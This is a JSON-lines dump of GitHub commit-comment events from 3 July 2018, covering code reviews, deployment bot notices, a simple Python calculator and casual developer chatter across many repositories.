{"id":"7914090391","type":"CommitCommentEvent","actor":{"login":"dschlaep"},"repo":{"name":"DrylandEcology/STEPWAT2"},"payload":{"comment":{"id":29584733,"position":null,"line":null,"path":null,"commit_id":"759af885d38be09f9b510479a38d219d25d52df0","created_at":"2018-07-03T17:46:51Z","updated_at":"2018-07-03T17:46:51Z","author_association":"MEMBER","body":"@kpalmqui I updated SOILWAT2 with output and memory fixes and reset the submodule pointer back to master branch."}},"created_at":"2018-07-03T17:46:51Z"}
{"id":"7914092462","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29584736,"position":null,"line":null,"path":null,"commit_id":"08508180a3c6cb7d0a01b775b0a00de796bd4159","created_at":"2018-07-03T17:47:13Z","updated_at":"2018-07-03T17:47:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-677](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-677).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-677-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T17:47:13Z"}
{"id":"7914097350","type":"CommitCommentEvent","actor":{"login":"iamnamannian"},"repo":{"name":"iamnamannian/Harsh"},"payload":{"comment":{"id":29584745,"position":null,"line":null,"path":null,"commit_id":"a7ca7751278b2fe42037ce2cc91a8e3f008b4f29","created_at":"2018-07-03T17:48:09Z","updated_at":"2018-07-03T17:48:09Z","author_association":"OWNER","body":"GOOD LUCK  TO YOU GUYS LEARNING THESE CODES."}},"created_at":"2018-07-03T17:48:09Z"}
{"id":"7914106633","type":"CommitCommentEvent","actor":{"login":"RamaPrasad999"},"repo":{"name":"RamaPrasad999/WBCSC"},"payload":{"comment":{"id":29584763,"position":null,"line":null,"path":null,"commit_id":"5bbb4ffd86e54ff0a0aba174ffce735e94290f56","created_at":"2018-07-03T17:50:00Z","updated_at":"2018-07-03T17:50:00Z","author_association":"OWNER","body":"Dear All, We made an apps for calculating the score in WBCSC following the score pattern issued by wbcsc. Please follow the link to download the apps (or download the attached file) and install "}},"created_at":"2018-07-03T17:50:00Z"}
{"id":"7914110578","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29584767,"position":null,"line":null,"path":null,"commit_id":"f70b69b53dc1c8fe600290ec35c6b342a28d5fd5","created_at":"2018-07-03T17:50:46Z","updated_at":"2018-07-03T17:50:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [009 - Criar Classes Endereco Services](https://trello.com/c/zD0pShgm/9-009-criar-classes-endereco-services)"}},"created_at":"2018-07-03T17:50:46Z"}
{"id":"7914112405","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584775,"position":30,"line":30,"path":"my_game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:51:09Z","updated_at":"2018-07-03T17:51:09Z","author_association":"NONE","body":"и вообще эта строчка, если подумать, она не из этого метода....\r\nметод же называется \"поведение дилера\"...\r\nпочему в нем проверяются руки игроков ?\r\nэта строка должны быть где-то перед вызовом этого метода\r\n"}},"created_at":"2018-07-03T17:51:09Z"}
{"id":"7914112575","type":"CommitCommentEvent","actor":{"login":"TheOnlyGhostwolf"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29584776,"position":null,"line":null,"path":null,"commit_id":"dea7c1ee858da977578e64b3bd266bc4459d8f3b","created_at":"2018-07-03T17:51:11Z","updated_at":"2018-07-03T17:51:11Z","author_association":"NONE","body":"awoo! what's this?? OWO UWU OWU"}},"created_at":"2018-07-03T17:51:11Z"}
{"id":"7914114020","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29584782,"position":null,"line":null,"path":null,"commit_id":"c9eb02b2757d86014ca2ff50197b3a59a3a9aaa1","created_at":"2018-07-03T17:51:29Z","updated_at":"2018-07-03T17:51:29Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#ci-17](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#ci-17).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-17-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T17:51:29Z"}
{"id":"7914116072","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584787,"position":31,"line":31,"path":"my_game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:51:54Z","updated_at":"2018-07-03T17:51:54Z","author_association":"NONE","body":"здесь тоже проверку лучше в отдельный метод с правильным названием\r\n"}},"created_at":"2018-07-03T17:51:54Z"}
{"id":"7914117290","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29584792,"position":null,"line":null,"path":null,"commit_id":"d980282e289da062f42db3ee48bfdaa089a761f0","created_at":"2018-07-03T17:52:10Z","updated_at":"2018-07-03T17:52:10Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-tandem4](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-tandem4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-tandem4-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T17:52:10Z"}
{"id":"7914122857","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29584803,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-03T17:53:17Z","updated_at":"2018-07-03T17:53:17Z","author_association":"OWNER","body":"I‘m not sure if we talk past each other right now, but when I build from the current master branch I get Armbian 5.51 and kernel 4.4.138. 🤔\r\nBut I‘m relatively sure, that I did not include the 8822bs driver when the driver name in wlan-platdata was rtl8919es. Can you modprobe r8822bs?"}},"created_at":"2018-07-03T17:53:17Z"}
{"id":"7914123567","type":"CommitCommentEvent","actor":{"login":"Muthu-Mariyappan"},"repo":{"name":"Muthu-Mariyappan/Blocking-api-with-Spring-AOP"},"payload":{"comment":{"id":29584805,"position":null,"line":null,"path":null,"commit_id":"e1229c8345a4f9c97f2e7523d179d8083a1e0d57","created_at":"2018-07-03T17:53:26Z","updated_at":"2018-07-03T17:53:26Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-03T17:53:26Z"}
{"id":"7914123655","type":"CommitCommentEvent","actor":{"login":"Rob58329"},"repo":{"name":"esp8266/Arduino"},"payload":{"comment":{"id":29584806,"position":null,"line":null,"path":null,"commit_id":"ebda795f34e6d09f5676782f0917ad298d9a9cdd","created_at":"2018-07-03T17:53:27Z","updated_at":"2018-07-03T17:53:27Z","author_association":"NONE","body":"@earlephilhower\r\n\r\nre. Compatibility and IRQ fixed for waveform/tone/pwm (#4872) - committed 2Jul18 (be7a732)\r\n\r\nThe latest commit (as above 2Jul18) fixes the \"tone(D8,3000);\" and \"tone(D8,3000,100);\" compile-issues.\r\nInterestinly, \"tone(D8,(uint16_t)3000)\" now also works again!\r\n\r\nMnay thanks! :-)"}},"created_at":"2018-07-03T17:53:27Z"}
{"id":"7914126321","type":"CommitCommentEvent","actor":{"login":"TheOnlyGhostwolf"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29584814,"position":null,"line":null,"path":null,"commit_id":"dea7c1ee858da977578e64b3bd266bc4459d8f3b","created_at":"2018-07-03T17:53:59Z","updated_at":"2018-07-03T17:53:59Z","author_association":"NONE","body":"Can I ping <@136549806079344640> through a webhook?"}},"created_at":"2018-07-03T17:53:59Z"}
{"id":"7914126594","type":"CommitCommentEvent","actor":{"login":"Chandranshu5"},"repo":{"name":"checarlos87/django-inventory-management"},"payload":{"comment":{"id":29584815,"position":null,"line":null,"path":null,"commit_id":"c457ae4e11280ee5f6bf7e2a22c0b75517a39eee","created_at":"2018-07-03T17:54:03Z","updated_at":"2018-07-03T17:54:03Z","author_association":"NONE","body":"manage.py is missing from the file, due to which unable to run the server."}},"created_at":"2018-07-03T17:54:03Z"}
{"id":"7914129753","type":"CommitCommentEvent","actor":{"login":"Chandranshu5"},"repo":{"name":"checarlos87/django-inventory-management"},"payload":{"comment":{"id":29584821,"position":null,"line":null,"path":null,"commit_id":"c457ae4e11280ee5f6bf7e2a22c0b75517a39eee","created_at":"2018-07-03T17:54:41Z","updated_at":"2018-07-03T17:54:41Z","author_association":"NONE","body":"how can I run the server without that. Please help me out."}},"created_at":"2018-07-03T17:54:41Z"}
{"id":"7914130196","type":"CommitCommentEvent","actor":{"login":"AdityaTD"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29584825,"position":null,"line":null,"path":null,"commit_id":"dea7c1ee858da977578e64b3bd266bc4459d8f3b","created_at":"2018-07-03T17:54:47Z","updated_at":"2018-07-03T17:54:47Z","author_association":"OWNER","body":"Yep"}},"created_at":"2018-07-03T17:54:47Z"}
{"id":"7914130365","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584826,"position":33,"line":33,"path":"my_game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:54:49Z","updated_at":"2018-07-03T17:54:49Z","author_association":"NONE","body":"почему из метода \"поведение дилера\" вызывается \"поведение игрока\" ?...\r\nони оба должны вызываться откуда-то еще... \r\nлибо надо поменять название метода... потому что он явно с дилером связан не сильно"}},"created_at":"2018-07-03T17:54:49Z"}
{"id":"7914130425","type":"CommitCommentEvent","actor":{"login":"alimuzzaman"},"repo":{"name":"wpCloud/wp-stateless"},"payload":{"comment":{"id":29584827,"position":null,"line":null,"path":null,"commit_id":"1cb4585fa62fe6e2b3aafa169bb7b09de74ee2b9","created_at":"2018-07-03T17:54:49Z","updated_at":"2018-07-03T17:54:49Z","author_association":"CONTRIBUTOR","body":"Issue #261"}},"created_at":"2018-07-03T17:54:49Z"}
{"id":"7914131738","type":"CommitCommentEvent","actor":{"login":"TheOnlyGhostwolf"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29584831,"position":null,"line":null,"path":null,"commit_id":"dea7c1ee858da977578e64b3bd266bc4459d8f3b","created_at":"2018-07-03T17:55:07Z","updated_at":"2018-07-03T17:55:07Z","author_association":"NONE","body":"That's cool OWO"}},"created_at":"2018-07-03T17:55:07Z"}
{"id":"7914136263","type":"CommitCommentEvent","actor":{"login":"Shigma"},"repo":{"name":"obstudio/Thulium-Music-3"},"payload":{"comment":{"id":29584839,"position":5,"line":48,"path":"index.js","commit_id":"479d2aee8ba28333666ae94669e3d5e2ab2b38fd","created_at":"2018-07-03T17:56:00Z","updated_at":"2018-07-03T17:56:00Z","author_association":"MEMBER","body":"不建议使用 npm，建议直接 exec。@jjyyxx \r\n"}},"created_at":"2018-07-03T17:56:00Z"}
{"id":"7914139690","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584852,"position":33,"line":33,"path":"my_game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:56:41Z","updated_at":"2018-07-03T17:56:41Z","author_association":"NONE","body":"и лучше может быть `dealser_turn` / `user_turn` ? или еще как-то так... или это какой-то известный тебе специфический термин из блек-джека?"}},"created_at":"2018-07-03T17:56:41Z"}
{"id":"7914140115","type":"CommitCommentEvent","actor":{"login":"iamnamannian"},"repo":{"name":"iamnamannian/Harsh"},"payload":{"comment":{"id":29584853,"position":1,"line":1,"path":"PYTHON CODE","commit_id":"ed53cc29412c0cf286da77244486998fd773b439","created_at":"2018-07-03T17:56:46Z","updated_at":"2018-07-03T17:56:46Z","author_association":"OWNER","body":"print(\"1.addition\")\r\nprint(\"2.subtraction\")\r\nprint(\"3.multiplication\")\r\nprint(\"4.division\")\r\nprint(\"5.exit\")\r\nchoice = int(input(\"enter your choice :\"));\r\nif (choice>=1 and choice <=4):\r\n   print(\"enter two number :\");\r\n   num1 = int(input());\r\n   num2 = int(input());\r\n   \r\n   if choice == 1:\r\n       res = num1 + num2;\r\n       print(\"RESULT:\",res);\r\n   elif choice == 2:\r\n       res = num1 - num2;\r\n       print(\"RESULT :\",res);\r\n   elif choice == 3:\r\n       res = num1 * num2 ;\r\n       print(\"RESULT :\",res);\r\n   else :\r\n       res = num1 / num2;\r\n       print(\"RESULT :\",res);\r\nelif choice == 5:\r\n    exit();\r\n\r\nelse :\r\n    print(\"wrong input..!!\");\r\n\r\nprint(\"--------------------------\")    \r\n     \r\n"}},"created_at":"2018-07-03T17:56:46Z"}
{"id":"7914143823","type":"CommitCommentEvent","actor":{"login":"TheOnlyGhostwolf"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29584867,"position":null,"line":null,"path":null,"commit_id":"dea7c1ee858da977578e64b3bd266bc4459d8f3b","created_at":"2018-07-03T17:57:31Z","updated_at":"2018-07-03T17:57:31Z","author_association":"NONE","body":"Can #github become #programmer-humor?"}},"created_at":"2018-07-03T17:57:31Z"}
{"id":"7914145688","type":"CommitCommentEvent","actor":{"login":"luffy04"},"repo":{"name":"luffy04/Project"},"payload":{"comment":{"id":29584872,"position":null,"line":null,"path":null,"commit_id":"ba2ae8e708df899f67b6196c733166a698ce5ec4","created_at":"2018-07-03T17:57:53Z","updated_at":"2018-07-03T17:57:53Z","author_association":"OWNER","body":"New"}},"created_at":"2018-07-03T17:57:53Z"}
{"id":"7914147291","type":"CommitCommentEvent","actor":{"login":"alvarocavalcanti"},"repo":{"name":"alvarocavalcanti/hoverpy"},"payload":{"comment":{"id":29584879,"position":null,"line":null,"path":null,"commit_id":"7e8e136f16f681447a8d2c8d621eb868827b8572","created_at":"2018-07-03T17:58:12Z","updated_at":"2018-07-03T17:58:12Z","author_association":"OWNER","body":"You're welcome!"}},"created_at":"2018-07-03T17:58:12Z"}
{"id":"7914150024","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584890,"position":18,"line":18,"path":"player.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:58:44Z","updated_at":"2018-07-03T17:58:44Z","author_association":"NONE","body":"если написать вот так: `@cards << deck.shift`, то будет происходить то же самое, но запись короче и понятней рубистам"}},"created_at":"2018-07-03T17:58:44Z"}
{"id":"7914153941","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584900,"position":18,"line":18,"path":"player.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:59:33Z","updated_at":"2018-07-03T17:59:33Z","author_association":"NONE","body":"```\r\n$ irb\r\n2.5.1 :001 > ar = [1, 2, 3]\r\n => [1, 2, 3] \r\n2.5.1 :002 > b = ar.shift\r\n => 1 \r\n2.5.1 :003 > b\r\n => 1 \r\n2.5.1 :004 > ar\r\n => [2, 3]\r\n```"}},"created_at":"2018-07-03T17:59:33Z"}
{"id":"7914154342","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/wahoo"},"payload":{"comment":{"id":29584901,"position":null,"line":null,"path":null,"commit_id":"2c5fbe8e661a6f9d4499580a0a216a766da7d0e8","created_at":"2018-07-03T17:59:38Z","updated_at":"2018-07-03T17:59:38Z","author_association":"OWNER","body":"Turns out I'm still using the stock modules, so I don't even need this"}},"created_at":"2018-07-03T17:59:38Z"}
{"id":"7914157579","type":"CommitCommentEvent","actor":{"login":"MFarejowicz"},"repo":{"name":"jynnie/accountability"},"payload":{"comment":{"id":29584908,"position":null,"line":null,"path":null,"commit_id":"0879174cde3009b5404f444bebe4c73f18c62ba8","created_at":"2018-07-03T18:00:16Z","updated_at":"2018-07-03T18:00:16Z","author_association":"COLLABORATOR","body":"Yo what book are you using?"}},"created_at":"2018-07-03T18:00:16Z"}
{"id":"7914158439","type":"CommitCommentEvent","actor":{"login":"markgoddard"},"repo":{"name":"stackhpc/ansible-role-os-images"},"payload":{"comment":{"id":29584915,"position":56,"line":190,"path":"tasks/main.yml","commit_id":"e78499a812e9a6370b43e13d33cc1956ebb35987","created_at":"2018-07-03T18:00:25Z","updated_at":"2018-07-03T18:00:25Z","author_association":"MEMBER","body":"Yeah, I wouldn't expect to be able to build an identical image, but if the image is already present locally we can check the checksum vs. glance. It's definitely a useful feature - currently building an image in a fresh environment requires you to delete existing glance images first.\r\n\r\nPerhaps before adding it it would be safest to implement a rename feature rather than deleting the existing images. Seemed ok to delete with --force-rebuild, but adding checksum checks could be a surprising behaviour change."}},"created_at":"2018-07-03T18:00:25Z"}
{"id":"7914158687","type":"CommitCommentEvent","actor":{"login":"zbeekman"},"repo":{"name":"sourceryinstitute/OpenCoarrays"},"payload":{"comment":{"id":29584916,"position":823,"line":823,"path":"src/iso-fortran-binding/ISO_Fortran_binding.c","commit_id":"7bb935f2f56844fb78f038aa75537c56d392b95d","created_at":"2018-07-03T18:00:28Z","updated_at":"2018-07-03T18:00:28Z","author_association":"MEMBER","body":"Clang generates a compiler waring for this line, that I think may be important:\r\n\r\n```\r\n/Users/ibeekman/Sandbox/OpenCoarrays/src/iso-fortran-binding/ISO_Fortran_binding.c:821:20: warning: comparison of unsigned expression < 0 is always false [-Wtautological-compare]\r\n  if (displacement < 0 || displacement > source->elem_len - 1)\r\n      ~~~~~~~~~~~~ ^ ~\r\n1 warning generated.\r\n```\r\n\r\n`displacement` looks like it's `size_t` so the LHS of the or operator will always be false, if I understand correctly."}},"created_at":"2018-07-03T18:00:28Z"}
{"id":"7914160025","type":"CommitCommentEvent","actor":{"login":"Nebres"},"repo":{"name":"Nebres/Kodilla-Course"},"payload":{"comment":{"id":29584920,"position":14,"line":11,"path":"kodilla-testing/src/test/java/com/kodilla/testing/library/BookDirectoryTestSuite.java","commit_id":"d5359c9db768f604358137c2b616f70b43e24772","created_at":"2018-07-03T18:00:43Z","updated_at":"2018-07-03T18:00:43Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/39964790/42236629-b8129d2e-7efb-11e8-97e1-96ff25993c20.png)\r\n\r\nDziała bardzo dobrze :).\r\n\r\n"}},"created_at":"2018-07-03T18:00:43Z"}
{"id":"7914160803","type":"CommitCommentEvent","actor":{"login":"blainegray"},"repo":{"name":"blainegray/Fritzing"},"payload":{"comment":{"id":29584922,"position":null,"line":null,"path":null,"commit_id":"3095f1133a76e21b7cec143f2bb2d93f8a1fdd6a","created_at":"2018-07-03T18:00:52Z","updated_at":"2018-07-03T18:00:52Z","author_association":"OWNER","body":"Greetings,\r\nI see that Fritzing has not been updated for two years. I see some comments about updating parts and Windows 10. How about a suggestion: partner somwhow with KiCad. KiCad is also an open source project with a focus on printed wiring boards. Fritzing also supports PWB. My greatest application for Fritzing is generating breadboard layouts for students to build and test circuits. I have not seen any other schematic and board layout tools that incorporates the physical and electrical properties of the breadboard with the physical properties of components and the electrical interconnection from the circuit schematic. Fritzing is a delightful product to use for both the faculty and the students. I would really not like to go back to colored pencils and paper to show the physical layout of the components and wires on the breadboard.\r\nThanks,\r\nBlaine"}},"created_at":"2018-07-03T18:00:52Z"}
{"id":"7914164757","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29584932,"position":null,"line":null,"path":null,"commit_id":"d541db4bf536506062859b4346016314904eb3d9","created_at":"2018-07-03T18:01:38Z","updated_at":"2018-07-03T18:01:38Z","author_association":"COLLABORATOR","body":"Good find @bouncyball-git ! For me that works for 14bit dual iso clips. For 12 and 10 bit it doesn't. And if I move the white slider only once lower than black slider dual iso stitching is broken until changing the clip."}},"created_at":"2018-07-03T18:01:38Z"}
{"id":"7914165343","type":"CommitCommentEvent","actor":{"login":"liangzihan233"},"repo":{"name":"liangzihan233/liangzihan233.github.io"},"payload":{"comment":{"id":29584936,"position":null,"line":null,"path":null,"commit_id":"36e951a463a9d72f2a6e67d02ba119284ce4dfd5","created_at":"2018-07-03T18:01:46Z","updated_at":"2018-07-03T18:01:46Z","author_association":"OWNER","body":"101"}},"created_at":"2018-07-03T18:01:46Z"}
{"id":"7914167568","type":"CommitCommentEvent","actor":{"login":"sahil107"},"repo":{"name":"GoogleCloudPlatform/dotnet-docs-samples"},"payload":{"comment":{"id":29584938,"position":null,"line":null,"path":null,"commit_id":"8b16f71c24f46d7eaa0b8876483458983640d3f1","created_at":"2018-07-03T18:02:13Z","updated_at":"2018-07-03T18:02:13Z","author_association":"NONE","body":"8b16f71"}},"created_at":"2018-07-03T18:02:13Z"}
{"id":"7914168071","type":"CommitCommentEvent","actor":{"login":"Surendrajat"},"repo":{"name":"TwrpBuilder/TwrpBuilder"},"payload":{"comment":{"id":29584942,"position":20,"line":82,"path":"app/src/main/res/values-ar/strings.xml","commit_id":"db1d38895c0b91b95df07f89e4f60f58a388dcf8","created_at":"2018-07-03T18:02:19Z","updated_at":"2018-07-03T18:02:19Z","author_association":"MEMBER","body":"Please keep `%1$s` together, its a string placeholder."}},"created_at":"2018-07-03T18:02:19Z"}
{"id":"7914173689","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584952,"position":17,"line":17,"path":"results.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T18:03:29Z","updated_at":"2018-07-03T18:03:29Z","author_association":"NONE","body":"какое-то снова не очень логичное имя у метода...\r\n`results` должен возвращать какое-то значение интуитивно, а он у тебя вызывает другие методы\r\nтут нужен какой-то глагол тогда... "}},"created_at":"2018-07-03T18:03:29Z"}
{"id":"7914174937","type":"CommitCommentEvent","actor":{"login":"tomwhoiscontrary"},"repo":{"name":"tim-group/stackbuilder"},"payload":{"comment":{"id":29584957,"position":null,"line":null,"path":null,"commit_id":"49079519bfca7d77dcc3949b91c6040632608b2c","created_at":"2018-07-03T18:03:43Z","updated_at":"2018-07-03T18:03:43Z","author_association":"NONE","body":"LGTM, merge"}},"created_at":"2018-07-03T18:03:43Z"}
{"id":"7914175960","type":"CommitCommentEvent","actor":{"login":"themesbazar1"},"repo":{"name":"ckeditor/ckeditor-dev"},"payload":{"comment":{"id":29584963,"position":null,"line":null,"path":null,"commit_id":"ae8cd6455b2d5b3d6b478fb3e6fc880bcb5af1e1","created_at":"2018-07-03T18:03:58Z","updated_at":"2018-07-03T18:03:58Z","author_association":"NONE","body":" follow me http://themesbazar.com"}},"created_at":"2018-07-03T18:03:58Z"}
{"id":"7914178424","type":"CommitCommentEvent","actor":{"login":"shanegramlich"},"repo":{"name":"shanegramlich/michelle"},"payload":{"comment":{"id":29584967,"position":null,"line":null,"path":null,"commit_id":"a2c0bfc6a0238bb18c5b647c0af788e60a2fa94e","created_at":"2018-07-03T18:04:26Z","updated_at":"2018-07-03T18:04:26Z","author_association":"OWNER","body":"Here's a comment on the beanstalk.png"}},"created_at":"2018-07-03T18:04:26Z"}
{"id":"7914179857","type":"CommitCommentEvent","actor":{"login":"strassek"},"repo":{"name":"intel/external-mesa"},"payload":{"comment":{"id":29584971,"position":5,"line":67,"path":"src/intel/vulkan/anv_intel.c","commit_id":"843315fd4f0f942ed252f2183b9806d1e31e0fc3","created_at":"2018-07-03T18:04:46Z","updated_at":"2018-07-03T18:04:46Z","author_association":"CONTRIBUTOR","body":"Yes, still needed by IAHWC"}},"created_at":"2018-07-03T18:04:46Z"}
{"id":"7914181082","type":"CommitCommentEvent","actor":{"login":"triple-underscore"},"repo":{"name":"triple-underscore/triple-underscore.github.io"},"payload":{"comment":{"id":29584977,"position":null,"line":null,"path":null,"commit_id":"07715ec09908b2acb7fe9d4b8adb3c0bb8cd2b77","created_at":"2018-07-03T18:05:01Z","updated_at":"2018-07-03T18:05:01Z","author_association":"OWNER","body":"Only apply 0 < 1 radius-to-spread ratio adjustment for outset shadows; inset shadows don't need it because their radii shrink rather than grow.\r\nhttps://github.com/w3c/csswg-drafts/commit/c9cab7a6750825ff084e7bb0be181b18d71780d2\r\n\r\nExplicitly mention continuity as rationale for radius adjustment formula.\r\nhttps://github.com/w3c/csswg-drafts/commit/f885ef0ae5aae797794c1ca279ef1a9e4d35b00e\r\n"}},"created_at":"2018-07-03T18:05:01Z"}
{"id":"7914181132","type":"CommitCommentEvent","actor":{"login":"omidkrad"},"repo":{"name":"moby/moby"},"payload":{"comment":{"id":29584979,"position":25,"line":329,"path":"pkg/namesgenerator/names-generator.go","commit_id":"d762dcd147e379ba57b21e0dee6f615e3f54938e","created_at":"2018-07-03T18:05:01Z","updated_at":"2018-07-03T18:05:01Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-03T18:05:01Z"}
{"id":"7914182035","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584984,"position":48,"line":48,"path":"ui.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T18:05:13Z","updated_at":"2018-07-03T18:05:13Z","author_association":"NONE","body":"этот модуль не должен содержать никаких вызовов методов других классов / модулей, если это не методы интерфейса\r\nу тебя же получается, что методы интерфейса вызывают методы рантайма... это в корне неверно "}},"created_at":"2018-07-03T18:05:13Z"}
{"id":"7914186339","type":"CommitCommentEvent","actor":{"login":"shanegramlich"},"repo":{"name":"shanegramlich/michelle"},"payload":{"comment":{"id":29584998,"position":1,"line":1,"path":".gitattributes","commit_id":"86021c6b4ef1a1148079ba76b881eb3e4a966d31","created_at":"2018-07-03T18:06:09Z","updated_at":"2018-07-03T18:06:09Z","author_association":"OWNER","body":"A comment on the .gitattributes line 1"}},"created_at":"2018-07-03T18:06:09Z"}
{"id":"7914187736","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29585005,"position":31,"line":66,"path":"lib/node_modules/@stdlib/utils/README.md","commit_id":"61db79af3f85cc0a3277e1227f8649e9dbbfcfa2","created_at":"2018-07-03T18:06:25Z","updated_at":"2018-07-03T18:06:25Z","author_association":"MEMBER","body":"Is this the intended ordering?"}},"created_at":"2018-07-03T18:06:25Z"}
{"id":"7914187935","type":"CommitCommentEvent","actor":{"login":"GrandyB"},"repo":{"name":"CatxFish/motion-filter"},"payload":{"comment":{"id":29585006,"position":140,"line":163,"path":"src/motion-filter.c","commit_id":"d52a46b9333ec417b3deeacfed539588b529f816","created_at":"2018-07-03T18:06:28Z","updated_at":"2018-07-03T18:06:28Z","author_association":"NONE","body":"#3 I believe this changed fixed this"}},"created_at":"2018-07-03T18:06:28Z"}
{"id":"7914188572","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29585008,"position":null,"line":null,"path":null,"commit_id":"44bd0f972916ff7720879ac4e3d0fbd078438f72","created_at":"2018-07-03T18:06:36Z","updated_at":"2018-07-03T18:06:36Z","author_association":"COLLABORATOR","body":"Excellent! :)"}},"created_at":"2018-07-03T18:06:36Z"}
{"id":"7914188828","type":"CommitCommentEvent","actor":{"login":"RickKimball"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29585011,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T18:06:40Z","updated_at":"2018-07-03T18:06:40Z","author_association":"CONTRIBUTOR","body":"@stevstrong that does seems to illustrate the problem. \r\n\r\no My suggestion is to stop commenting on this thread. \r\no Create a new issue. Provide your sample code illustrating the problem. \r\no Create a new pull request with the new delay() code.  \r\no Get people to test it in a variety of situations. Then suggest it be implemented.\r\n"}},"created_at":"2018-07-03T18:06:40Z"}
{"id":"7914192713","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29585016,"position":48,"line":48,"path":"ui.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T18:07:30Z","updated_at":"2018-07-03T18:07:30Z","author_association":"NONE","body":"еще раз...\r\nникаких \"путсов\" и \"гетсов\" не должно быть ни в одном классе, кроме класса (или классов), который за интерфейс отвечает\r\nпричем он (класс интерфейса) больше вообще ничего не делает\r\nлибо выводит, либо получает данные\r\nиз класса (возможно классов), несущего рантайм проги,  (видимо Гейм в твоем случае) ты работаешь с интерфейсом примерно так:\r\n```ruby\r\n@interface.show_main_menu\r\n....\r\n....\r\n@interface.ask_take_one_more_card\r\nuser_choice = @interface.user_answer_for_one_more_card\r\n```"}},"created_at":"2018-07-03T18:07:30Z"}
